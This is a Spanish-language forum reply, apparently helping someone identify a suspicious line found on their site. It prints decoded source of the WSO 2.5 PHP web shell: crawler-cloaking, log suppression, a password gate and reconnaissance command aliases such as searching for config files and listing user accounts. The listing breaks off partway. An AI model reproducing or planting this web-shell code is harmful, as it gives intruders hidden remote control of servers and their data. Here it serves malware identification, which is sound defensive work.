Tema: Informacion creo bug y backdoor..
Ver Mensaje Individual
  #3 (permalink)  
Antiguo 15/03/2012, 05:34
Avatar de hasdpk
hasdpk
 
Fecha de Ingreso: agosto-2011
Ubicación: $spain->city( 'Arucas' );
Mensajes: 1.800
Antigüedad: 12 años, 8 meses
Puntos: 297
Respuesta: Informacion creo bug y backdoor..
Seguramente sea de algún trojano o algo parecido, esa línea contiene este código:

Código PHP: 
Ver original
  1. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  2.  
  3.     $userAgents = array("Google",
  4.                         "Slurp",
  5.                         "MSNBot",
  6.                         "ia_archiver",
  7.                         "Yandex",
  8.                         "Rambler"); 
  9.                         
  10.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  11.     
  12.         header('HTTP/1.0 404 Not Found');
  13.         exit;
  14.  
  15.     }
  16.  
  17. }
  18.  
  19. @ini_set('error_log',NULL);
  20. @ini_set('log_errors',0);
  21. @ini_set('max_execution_time',0);
  22. @set_time_limit(0);
  23. @set_magic_quotes_runtime(0);
  24. @define('WSO_VERSION', '2.5');
  25.  
  26. if(get_magic_quotes_gpc()) {
  27.  
  28.     function WSOstripslashes($array) {
  29.  
  30.         return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
  31.  
  32.     }
  33.  
  34.     $_POST = WSOstripslashes($_POST);
  35.     $_COOKIE = WSOstripslashes($_COOKIE);
  36.  
  37. }
  38.  
  39. function wsoLogin() {
  40.  
  41.     die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
  42.     
  43. }
  44.  
  45. function WSOsetcookie($k, $v) {
  46.  
  47.     $_COOKIE[$k] = $v;
  48.     setcookie($k, $v);
  49.  
  50. }
  51.  
  52. if(!empty($auth_pass)) {
  53.  
  54.     if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
  55.         WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
  56.         
  57.     if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
  58.         wsoLogin();
  59.  
  60. }
  61.  
  62. if(strtolower(substr(PHP_OS,0,3)) == "win")
  63.     $os = 'win';
  64. else
  65.     $os = 'nix';    
  66.     $safe_mode = @ini_get('safe_mode');
  67.  
  68. if(!$safe_mode)
  69.     error_reporting(0);
  70.     $disable_functions = @ini_get('disable_functions');
  71.     $home_cwd = @getcwd();
  72.     
  73. if(isset($_POST['c']))
  74.     @chdir($_POST['c']);
  75.     $cwd = @getcwd();
  76.     
  77. if($os == 'win') {
  78.     $home_cwd = str_replace("\\", "/", $home_cwd);
  79.     $cwd = str_replace("\\", "/", $cwd);
  80.     }
  81.     
  82. if($cwd[strlen($cwd)-1] != '/')
  83.     $cwd .= '/';
  84.     
  85. if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax']))
  86.     $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax;
  87.     
  88. if($os == 'win')
  89.     $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" );
  90. else
  91.     $aliases = array( "List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -v